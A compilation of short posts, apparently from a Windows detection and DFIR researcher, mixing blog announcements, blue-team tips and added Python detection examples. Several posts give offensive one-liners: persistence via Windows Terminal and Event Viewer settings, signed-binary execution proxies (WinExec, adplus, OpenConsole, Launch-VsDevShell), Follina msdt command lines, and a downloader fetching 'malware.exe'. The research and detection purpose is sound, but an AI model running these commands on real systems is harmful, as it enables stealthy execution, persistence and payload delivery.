Since everyone patches systems based on what infosec Twitter is currently hyping, we should do a weekly hype for old vulnerabilities and pretend that they are new; then maybe people will care.
Here is a stupid way to persist on a machine using WindowsTerminal profiles.
1-Modify the "settings.json" located in %localappdata% and add a custom profile that contains your payload
2-Change the "defaultProfile" value and put your GUID
3-Add the value "startOnUserLogin": true
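As an added example (not from the original post), here is a Python hunt for the trick above: it parses a constructed settings.json and flags a default profile that is set to start at logon but does not run a known shell.

```python
import json

# Shells normally expected as a Windows Terminal profile "commandline".
KNOWN_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wsl.exe", "bash.exe"}

# Constructed settings.json (GUIDs made up). Real files may also carry
# // comments, which json.loads rejects; strip them before parsing a live file.
SAMPLE_SETTINGS = r'''{
    "defaultProfile": "{11111111-2222-3333-4444-555555555555}",
    "startOnUserLogin": true,
    "profiles": {
        "list": [
            {"guid": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}",
             "name": "PowerShell", "commandline": "powershell.exe"},
            {"guid": "{11111111-2222-3333-4444-555555555555}",
             "name": "Updater",
             "commandline": "\"C:\\Users\\Public\\svc update.exe\" /quiet"}
        ]
    }
}'''

def executable_name(commandline: str) -> str:
    """Basename of the first token, honouring a quoted path with spaces."""
    cmd = commandline.strip()
    if cmd.startswith('"'):
        first = cmd[1:].split('"', 1)[0]
    else:
        first = cmd.split(None, 1)[0] if cmd else ""
    return first.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_suspicious_startup_profile(settings_text: str):
    """Return the default profile dict if Terminal auto-starts at logon and
    that profile runs something other than a known shell, else None."""
    settings = json.loads(settings_text)
    if not settings.get("startOnUserLogin", False):
        return None                              # nothing launches at logon
    default_guid = settings.get("defaultProfile")
    profiles = settings.get("profiles", {})
    # "profiles" is a bare list in older files and {"list": [...]} in newer ones
    entries = profiles.get("list", []) if isinstance(profiles, dict) else profiles
    for profile in entries:
        if profile.get("guid") != default_guid:
            continue
        cmd = profile.get("commandline")
        if cmd is None:
            return None   # generated profile (e.g. a "source" entry), no custom command
        if executable_name(cmd) not in KNOWN_SHELLS:
            return profile
    return None
```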
If you have Symantec SEP installed, you can use the "Symantec.SSHelper" COM object to launch processes and download arbitrary files.
The "User-Agent: Symantec Agent" can be used to identify requests made by the "HIDownloadURLFile".
In addition to the documented "-e/--exec" flag in #lolbas about the "wsl.exe" binary (), we can also use the "--system" flag to run Linux (as root) / Windows commands.
wsl --system [Command]
A quick DFIR tip for the weekend.
Now that Notepad on Win 11 saves its state and can open tabs, it means history is saved somewhere :)
Well, that somewhere is in %localappdata%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState
A new location to monitor and…
By creating the key "telnet.exe" in the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" registry and setting the "Default" key to any executable, we can call it by running the command:
rundll32.exe url.dll,TelnetProtocolHandler
We need blue team people to start writing malware that can move laterally and persist and all that good shit but the payload is to enable PowerShell logging and install Sysmon 😂
If you have a #Symantec Endpoint Protection Manager (SEPM) instance installed, you can use the signed "WinExec" binary to launch arbitrary commands.
WinExec.exe "[InsertCommand]"
It'll execute the command(s) in question using "cmd.exe /c [Command]"
#lolbin
In this blog post, I take a look at some of the lesser known #Windows Event Log files and try to find interesting artifacts for #DFIR and #ThreatHunting.
Thanks for reading.
Feedback is really appreciated.
PowerShell has a list of suspicious keywords. If one is found in a script block, an automatic 4104 event will be generated regardless of logging policy :) (True for both PWSH 5/7)
Look for EID 4104 with Level 3 (Warning)
Full List:
I created a new project called C2-Matrix-Indicators that aims to take a code review approach to extract detections/indicators out of the C2s listed in the @c2_matrix
Feedback and contributions are highly appreciated.
LINK:
#BlueTeam
#detection
#infosec
[Blog📚] A Primer On Event Tracing For Windows (ETW)
In this blog I cover the following topics
- Introduction to ETW
- Provider Manifest Structure
- Tools and Techniques to Interact With ETW
#infosec
#blueteam
#windows
One thing I dislike about Windows file "properties" is that it chooses to hide or show some information depending on the extension of the file.
For example a ".cpl" has an original filename field, but if you inspect it, it won't show it. Change the extension to ".dll" and it's now…
msdt #follina run from the CLI directly doesn't require the "IT_RebrowseForFile" nor "ms-msdt". See minimal POC below
msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Real life infosec reminder:
- Most companies don't have detection teams. At best AV with old sigs.
- Servers are not updated every month. Most still have Win7 and 2008.
- Most stuff is left in default config state.
- If they have 💰, then they buy the leader in Gartner and leave it as is.
First blog of 2021
Common Tools & Techniques Used By Threat Actors and Malware — Part I
If you're starting as a threat hunter or a detection engineer give this a read.
Feedback is appreciated.
#threathunting
#BlueTeam
#detection
#engineering
To get people into blue teaming, we need a series similar to Mr. Robot but the main character is a blue teamer/EDR admin. Deploying GPOs and answering support tickets and tuning FPs.
Make that exciting Netflix😅
#Windows Third-Party #AppsForensics Reference Guide provides a detailed exploration of artifacts from 46 third-party applications commonly found on devices running the Windows operating system.
Download:
Download in Portuguese:
As a detection engineer writing detections for a product, you'll face the reality that you need to write the same detection using multiple sources:
- Security Log
- Sysmon
- PowerShell Scriptblock (if its powershell related)
- Kernel / EDR source
- ETW counterpart Kernel-Process…
Created a new repository that contains resources (blogs, slides, talks...) to learn and understand SIGMA Rules.
If you have any related resources please feel free to contribute.
#sigma
#detection
#infosec
#resources
MAL-CL now has coverage for 40+ different tools. Every tool has
➡️MITRE Mapping.
➡️Detections (Splunk, Sigma, Elastic, Azure) when possible.
➡️Common Command-lines
➡️Sandbox Execution & Event logs to monitor
And much more to come.
Github:
Here is a quick write-up for one of the most convoluted LOLBINs to set up.
StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems.
It calls to a function named "RunCommand" that directly allows the…
[New Blog] I just published "Symantec Endpoint Protection Meets COM — Using “Symantec.SSHelper” As A LOLBIN" detailing how I found the Symantec.SSHelper #lolbin and the many features it offers.
Feedback is appreciated as always 🙏
I'm here to remind you that the most underrated and slept on C2 is actually Merlin.
Been there for a long time and still has a very low detection rate across the board.
You all be underestimating the power of low detections with go based stuff.
Everyone gets a LOLBIN in this new blog post about some cool binaries I found that can be abused from AV uninstallers and their tooling. 📚
#lolbins
#lolbas
#windows
#blueteam
I feel many people should actually work in the front line of defense. With broken SIEMs, unmanaged and underpaid teams, missing logs, broken workflows...etc.
Many, and I mean many talk from their Ivory tower 6/7 figure job with the best, and taking one continent they live in or…
As we all know, true APTs and TAs avoid using "whoami" as it's a sign of weakness.
So here is a thread of 14 examples of APTs and TAs executing it over the years.
MosesStaff By Checkpoint
1/🧵
The "PCW.debugreport.xml" file inside %localappdata%\Diagnostics and %localappdata%\ElevatedDiagnostics (for elevated instances) is generated when executing the #follina thingy and it contains the payload. Maybe good for #dfir. Did anyone look into this?
Using the "Pcwrun" binary we can also trigger #follina, as this will be equivalent to running #msdt with an answer file (See Image).
"Pcwrun /../../$(calc).exe" Will spawn "msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af %temp%\PCWXXXX.xml /skip TRUE"
#lolbin
We know from LOLBAS that adplus can be used to dump lsass (). But you can also use it to run arbitrary commands and binaries with the "-sc" flag.
#lolbin
#lolbas
adplus.exe -crash -o [OutputDir] -sc [Command]
[New Blog] I just published Symantec EDR Internals — Criterion
This is the first blog in a series where I'll dive into the internals of the detection technologies and mechanisms used by @symantec #EDR
Feedback is really appreciated.
MindMap I made a while back covering some of the common Windows system processes, their parent/child relationships and default behavior.
Link:
#Detection
#BlueTeam
#MalwareAnalysisTip
If you see the "/e:VBScript.Encode" flag in a command line, this "indicates" that the file is an encoded VBS.
You can use the following tools to decode it:
1)
2)
Examples:
I'm really excited and delighted to share that I have joined @nextronsystems as Threat Researcher. Super stoked to work with @cyb3rops and the team and provide more blueness to the world 💙😁
🧙♂️Introducing SigmaHQ GUI 🧙♂️
This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules ->
Read more about the tool in this release blog ->
⚒️…
Took some time to put the discussion from the thread below into a more coherent and digestible format.
TL;DR - If you're interested in how UWP and Windows desktop apps (store and other) are able to start on startup of Windows without touching the Run key or any typical persistence…
@James_inthe_box
@Hexacorn
@joshlemon
Small update :)
While the tangent we went on was good, I think I found the real culprit.
WindowsApps (Appx) have a special key to create startup tasks. It's in "HKEY_CURRENT_USER\Software\Classes\Local…
Did you know that when you disable "Real-time protection" on Defender, it's true that you won't receive events in the Defender Event log anymore (related to that feature).
But if you actually subscribe to the AMSI ETW {2A576B87-09A7-520E-C21A-4942F0271D67} provider you'd still…
You can use the "Microsoft-Windows-Services-Svchost" #ETW provider to spot fake "svchost" processes, as this provider will only track services started via the legitimate svchost. If it's not showing up then it's worth looking into.
#threathunting
#dfir
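An added example, not the author's code, of the correlation the post describes: join svchost.exe process creations to Microsoft-Windows-Services-Svchost events by PID and creation time, and report the ones the provider never backed. The event records and their field names are constructed and simplified, not the providers' real schema.

```python
from collections import defaultdict

# Constructed process-creation events (image basename, parent, timestamp).
PROC_EVENTS = [
    {"pid": 804,  "image": "svchost.exe", "parent": "services.exe", "ts": 100},
    {"pid": 1212, "image": "svchost.exe", "parent": "services.exe", "ts": 101},
    {"pid": 4488, "image": "svchost.exe", "parent": "explorer.exe", "ts": 300},
    {"pid": 5120, "image": "notepad.exe", "parent": "explorer.exe", "ts": 301},
]

# Constructed Microsoft-Windows-Services-Svchost events: per the post, the
# provider only emits these for services started inside a genuine svchost.
SVCHOST_ETW_EVENTS = [
    {"pid": 804,  "service": "Schedule", "ts": 100},
    {"pid": 1212, "service": "Dhcp",     "ts": 102},
    {"pid": 1212, "service": "EventLog", "ts": 103},
]

def find_unbacked_svchost(proc_events, etw_events, grace=5):
    """Return PIDs of svchost.exe processes with no Services-Svchost ETW
    event within `grace` seconds after creation.

    The time window matters: PIDs get reused, so an ETW record for the same
    PID from an earlier or much later process must not count as a match.
    """
    etw_times = defaultdict(list)
    for e in etw_events:
        etw_times[e["pid"]].append(e["ts"])

    suspects = []
    for p in proc_events:
        if p["image"].lower() != "svchost.exe":
            continue
        # A real service host logs a service start shortly after it spawns.
        backed = any(p["ts"] <= ts <= p["ts"] + grace
                     for ts in etw_times.get(p["pid"], []))
        if not backed:
            suspects.append(p["pid"])
    return suspects
```

A too-small grace window turns slow-starting legitimate hosts into false positives, so tune it against your own baseline before alerting on the result.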
Following @SwiftOnSecurity's amazing thread (), I've compiled some of the tools mentioned in it with their corresponding links in the thread below (for reference and easy finding).
EDRs/AVs sometimes trust certain locations or perform certain behavior when met with unexpected weirdness. Here are some ideas to check/test for, the next time you have some alone time with your solution
1/🧵
I love it when threat actors are old-school users of Windows. Instead of traditional methods to enumerate local groups on a machine, the TA used the "local.exe" utility that's part of the "Windows 2000 Resource Kit Tools".
It's physically impossible to keep up with the research being released nowadays. Basically life becomes a mix of FOMO, Imposter Syndrome and eventual burnout😭
What's the solution you might ask? Welp it turns out, no one is actually keeping up with everything. 😂Everyone is…
[COMING SOON]
Atomic Red Team 🐦 Integration is coming to SigmaHQ 🧙♂️
Sigma rules will be validated regularly against atomics directly in the Sigma CI pipelines to ensure even more quality.
Will share more in time 🔥
If you use PowerShell 7, know that logging is not in the usual "Microsoft-Windows-PowerShell/Operational" but instead in "PowerShellCore/Operational", which you need to enable. Use "RegisterManifest.ps1" and "InstallPSCorePolicyDefinitions.ps1" to get it.
[Blog📚] Finding Detection and Forensic Goodness In ETW Providers
In this blog I take a look at some of the telemetry provided by the different ETW providers that can be used for detection/forensic investigations.
#BlueTeam
#ETW
#Windows
#dfir
I think it's high time we stopped fucking around and pretending security is working. We've been getting high severity vulnerabilities every couple of days for the last 6-7 months; it's not even funny anymore.
No amount of 100% coverage will save you. So let's get a grip and stop…
In my stupid quest to find #lolbin's in any software, here is one that's part of the "Advanced Installer" software that conveniently has the description "File that launches another file".
viewer.exe /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "Command" [Args]
It's also signed.
Persistence via Event Viewer help link 😅 using "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer\"
Add "MicrosoftRedirectionProgram" with your program and set "ConfirmUrl" to 1 to avoid the prompt.
Here is another signed #lolbin to proxy your execution through, available with a fresh VStudio installation. (C:\Program Files (x86)\Microsoft Visual Studio\20XX\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\osXX\)
#lolbas
OpenConsole.exe <Payload>
Here is a nice #lolbas #LOLScript that's part of the VStudio install (Launch-VsDevShell). It has an IEX call that accepts passed args via the "-VsWherePath" and "-VsInstallationPath" flags. 🧵1/3
.\Launch-VsDevShell.ps1 -VsWherePath 'C:\Windows\System32\calc.exe'
#lolbin
If you're doing #dfir on a machine that has a WSL distro installed, don't forget to check the "ext4.vhdx" for any susp activity initiated from there. Even on a live system you can open the file using 7Zip for example and check the ".bash_history" among other things :)
#detection
#follina is patched, but did you know you could use a .diagcab file with an embedded answer file? Then the only required flag becomes "/cab" (and one-click, as I couldn't find how to skip the UI...🥲)
#lolbin
msdt /cab PCWDiagnostic.diagcab
One of the best things to invest in if you're building detections is to baseline server/service child processes.
More often than not, all entry vectors (RCE, Phish...etc) will spawn a "suspicious" child process.
From "java" and "tomcat" to "winword" and "svchost" 🧵
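An added example (not from the original thread) of the baseline the post recommends: learn parent-to-child pairs from a known-good period, then flag children of the watched server and service parents that fall outside it. The process-creation records are constructed.

```python
from collections import defaultdict

# Entry-point parents the post calls out: server/service processes whose
# children are worth baselining.
WATCHED_PARENTS = {"java.exe", "tomcat9.exe", "w3wp.exe", "winword.exe", "svchost.exe"}

# Constructed "known good" period of (parent, child) process creations.
BASELINE_EVENTS = [
    ("tomcat9.exe", "java.exe"), ("java.exe", "conhost.exe"),
    ("w3wp.exe", "csc.exe"), ("w3wp.exe", "conhost.exe"),
    ("winword.exe", "splwow64.exe"), ("svchost.exe", "wermgr.exe"),
    ("svchost.exe", "taskhostw.exe"),
]

# Constructed events from a later day: (parent, child, command line).
NEW_EVENTS = [
    ("java.exe", "conhost.exe", "conhost.exe 0xffffffff"),
    ("java.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("winword.exe", "powershell.exe", "powershell.exe -File update.ps1"),
    ("svchost.exe", "taskhostw.exe", "taskhostw.exe"),
    ("explorer.exe", "cmd.exe", "cmd.exe"),
]

def build_baseline(events):
    """Map each watched parent to the set of children seen in the period.
    A watched parent that never spawned anything gets no entry, so every
    later child of it is reported; that is intended for server processes."""
    baseline = defaultdict(set)
    for parent, child in events:
        if parent.lower() in WATCHED_PARENTS:
            baseline[parent.lower()].add(child.lower())
    return dict(baseline)

def find_deviations(events, baseline):
    """Return (parent, child, cmdline) for watched parents whose child is
    not in the baseline; unwatched parents are ignored."""
    hits = []
    for parent, child, cmdline in events:
        p, c = parent.lower(), child.lower()
        if p in WATCHED_PARENTS and c not in baseline.get(p, set()):
            hits.append((p, c, cmdline))
    return hits
```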
You can execute arbitrary Lua Scripts using the @FSecure signed "Products Uninstallation Tool" (FsUninstallationTool.exe)
FsUninstallationTool.exe -s -p mdr --scripts [ScriptFolderLocation]
*Requires "Administrator" to launch
#lolbin
#fsecure
Shocker news, but if you're building detections, don't focus on the new and shiny as it probably won't affect you. Instead prioritize building the fundamentals of detection such as renamed sys binaries, susp child processes, exec from susp locations, etc. These will help you forever.
Let's break down some easy [host-based] wins from the SNAKE report with some SIGMA detections.
#snakemalware
1- Persistence via Service [T1543.003] + Service Execution
I got a Work In Progress PR @sigma_hq based on this report, targeting IOCs and different ideas mentioned here and there.
Follow this stream for a list of rules to hunt for this :)
[New Blog] Understanding & Detecting C2 Frameworks — Ares
In this new series, I'll be diving into and exploring different C2 frameworks, to offer some understanding and detection opportunities for out of the box usage and configurations.
The @TheDFIRReport is one of the best things that happened to this industry. Providing extremely detailed reports with an extreme level of detail for every step. Showcasing what happens in the everyday attacks that millions of people face.
The best part is that it keeps on…
News flash! Your built in EDR rules aren't enough and worst of all you can't even update or understand what they detect.
Some might say, "I use a validation method so I know what they're detecting." You're only confirming a subset of a certain implementation of TTPs. So check again.…
I've been playing with the "Microsoft-Windows-Search-Core" ETW provider and I found some interesting stuff regarding the "search-ms" thingy. So full queries are logged in EID 51. E.g. running "search-ms:query=" from the Windows "Run" box you get the following event. 🧵1/4
This is a thread compiling different threads, blogs, and help offered by the infosec community related to the current situation. If you have additional links put them here. 🧵
[Blog 🪡] In this new blog series I'm calling "Behind The Detection", I'll be sharing some tips and ideas on building detections using SIGMA.
In this introductory post, I take a look at some schtasks examples and give a taste of what's to come.
#blueteam
TisEzIns, a binary bundled with the Trend Micro installer that "Helps download the Trend Micro software installer", can be abused to download arbitrary files.
#lolbin
TisEzIns.exe /b /u "http://IP/malware.exe" /f "C:\path\to\save\malware.exe"
Read More:
I love how APTs use the latest and greatest zero days and bypasses for entry and persistence. And then you have rundll32 executing files from Windows\Temp with a .txt extension 😅 got bored in the middle of the operation.
[Blog] LOLBINed — Using Kaspersky Endpoint Security ‘KES’ Installer to Execute Arbitrary Commands
An interesting set of issues I found at the start of the year in the KES installer and related products.
Enjoy 😁